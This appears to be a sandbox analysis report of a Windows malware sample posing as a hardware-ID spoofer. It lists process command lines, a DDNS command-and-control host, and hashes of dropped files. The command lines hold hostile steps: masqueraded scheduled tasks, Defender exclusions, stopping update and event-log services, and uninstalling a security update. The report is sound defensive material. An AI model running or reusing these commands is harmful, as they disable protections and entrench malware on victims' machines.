C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628769HP-TRGT4560FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528769HP-TRGT4560SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828769HP-TRGT4560SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228769HP-TRGT4560RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728788HP-TRGT3515MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628788HP-TRGT3515FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328788HP-TRGT3515DQ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428788HP-TRGT3515FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528788HP-TRGT3515SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828788HP-TRGT3515SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228788HP-TRGT3515RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28788HP-TRGT3515AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28805HP-TRGT24489AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328805HP-TRGT24489DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728805HP-TRGT24489MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628805HP-TRGT24489FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428805HP-TRGT24489FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528805HP-TRGT24489SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828805HP-TRGT24489SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228805HP-TRGT24489RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Temp\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YNjaADP11G.bat"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 17.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/2452-0-0x0000000074680000-0x0000000074C31000-memory.dmp
memory/2452-1-0x0000000074680000-0x0000000074C31000-memory.dmp
memory/2452-2-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
memory/2452-3-0x0000000074680000-0x0000000074C31000-memory.dmp
memory/2452-4-0x0000000074680000-0x0000000074C31000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 6325b6182c988ad8d54e7122a140e6b5 |
| SHA1 | 4b1f8a319f9b29ab3707814ec329ebf07f2cc7cf |
| SHA256 | c3ffcf8f947ae9766f07dc024a4a8372fc854333d9c561ade4d923f744ba52f8 |
| SHA512 | 4f2e388a2fc7c52e5408490508d13c8dba290f98559f4ec178fdf220990b33b9c2fb7a159f777beca585694f9b9d6eb71f47ef45da61f4631a7d625c04f614c9 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 64a5d40d76e76be2500f5b1de2c7cc30 |
| SHA1 | e9686932695bcd0eaef0bb8d4fc59a52030f90b0 |
| SHA256 | aaf32d00721e77dc86fad2711e1680d031e5acd8676128547eee09721f279436 |
| SHA512 | 1dc930e1a632ba174ad5d71f412c103eb050cd27b088387b71216cd8af72e4868d61f4bdb592c086a1abe258161729d8d48cd93a5f1a52d7ac2c06afdb3eee36 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | fa39a2f1c265a76ad0331010cc675c3d |
| SHA1 | e995206fd85eaacf73eb34e1a0682cc89707e8d7 |
| SHA256 | 17793e77ef0ea732ca698d043b9c89c81e24ba063a60703c0614a041503b3413 |
| SHA512 | c42d1e993ced2d0b2e402a8bcbb45258243f87af13e58f518ed72ada4cf8d1f36062ef55ccd8494838e679e107134618c52c4427344bd8c4823a3a97280daf4c |
memory/3684-16-0x0000000000160000-0x0000000000484000-memory.dmp
memory/3684-17-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 4be192f79e66b6d817de7853d3b93c38 |
| SHA1 | 18c030dfa65001c6ce8914e09c10aa9e1e1a9a66 |
| SHA256 | e01b7f059c4e05671c3589f6685943317b208ffe3e0eecbc139a0ea54564ece3 |
| SHA512 | 58a4f9085038d416fd7864d91abcc4edbd0b7fba441595358d7b1b6a356685e5bb51ff9da019e8cff6dd673cd0566ef358242d1d3699f8468188367758f3190b |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | b23300557af343583a8ee4513f9a6ec2 |
| SHA1 | f5d8ad6525b47a40a76d7a2a58f45eb5d31671db |
| SHA256 | 9afa98012a8cfd2d98528432e6c22a9bcfd6600cdeae25fc261527174b60d133 |
| SHA512 | 74db07c4187e88a0bcfe3fda0fa8779ae264de93435473d8d5376bdbf5fe3284445451d79c74dc9a92583dc23a2c50bbecd998eac5799a9de1e1814df761a6bb |
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 4cde2704ba1f70df394d12972a9f0089 |
| SHA1 | e7e2edcefefb354a1d42c8bc6089c29168493aaf |
| SHA256 | b8736adf57787251b019a95f431e2c8065a58c8dc946853e61c22b80dfa056cb |
| SHA512 | 12a5381096866e3a996000aba09182c074a55afc2d0af6d78e90eb76fbe93f3b211e91d78a72de458429777e4a97830b585a81818c8df23acde0b459d3f45c6c |
memory/3512-29-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2452-31-0x0000000074680000-0x0000000074C31000-memory.dmp
memory/3512-32-0x000000007FA70000-0x000000007FE41000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 9f6d01dde54a7635749ccb46ee55b60c |
| SHA1 | ae92ca1a982d1c59271b3ade5842a6db81c7734e |
| SHA256 | b5a6bac604b1109fd932b154b8c1beb35ab94b52c5085f69e3d291484544d8a5 |
| SHA512 | 40e7927764ecb25fd72eb25fc31441b4ca4196da5493f2c14527b9258aa17072fa986848678e6e67ff7cf353a16d052e1ff7c3f1ed6b0f2cafdb69e39e2f65d4 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | b91fd6835686fcbe424710a3bc7d6875 |
| SHA1 | 95ba044a0c7ef5e952cca3790aed6631a9c19090 |
| SHA256 | 60bb8f713c811c53abbea4c8ed5305601c933ed116fe3f5397c8154eb9c9013f |
| SHA512 | ca467234707ee5bff2cea6554a4f74bf95324725b129cdc43358f6bffedd9ea137361cab58c12526af64c3171fc1880aabf15dcf33b1a9d65747319244512fd4 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 3852d8a4224646c2925c7d9b6bbe2b01 |
| SHA1 | a7e4ae9295b3bef0cf3a96626b1cd73edab7bfc6 |
| SHA256 | debbd838c3c980c25da16aed115b2574f653b30471e4134b25472690c5e518d9 |
| SHA512 | 2d03e5741e6e283576195de3420f3d879131bedb02e7831116c66427e7a3aeb0e7088b1882340c7ec5a9fe68b5d6b752522ae7e48fff08d7db60329c738ffbf5 |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | e0830c0edad924b513dd42350eae29f3 |
| SHA1 | 6cc9c7b5ab750cd74674b8b2d81edc967dbabd53 |
| SHA256 | 4ebc90356f8bcc7222401ea1b56480af5a18f701cc631d5cb04aebba8a3d4531 |
| SHA512 | 6add31c8fe6e45a99d15620bb382bc633c46343fda92ded36d04475a21ce463ed1aa4f9f637efa179608cc58ab90cb834bd69706501293134826cd96d426e5d4 |
memory/3428-70-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp
memory/3512-69-0x0000000000400000-0x0000000001274000-memory.dmp
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | acec1f9aeeaf540a542c10935731eb5f |
| SHA1 | 718d4723e6ca3b6ba683beb9a4518410f03d7aca |
| SHA256 | 57c4a0472d32cca25b20f7136075cc23dcbc8c4a17f3a05fd6a487071ceb7a01 |
| SHA512 | 94b3efd79364b4f4a9bc201c7f78350f7dc2c987585dec9ce16efa6a247dbfc26461657949d195aaf4ab28826432ab72fd6977f4a69d6ea2d75daec504b50b11 |
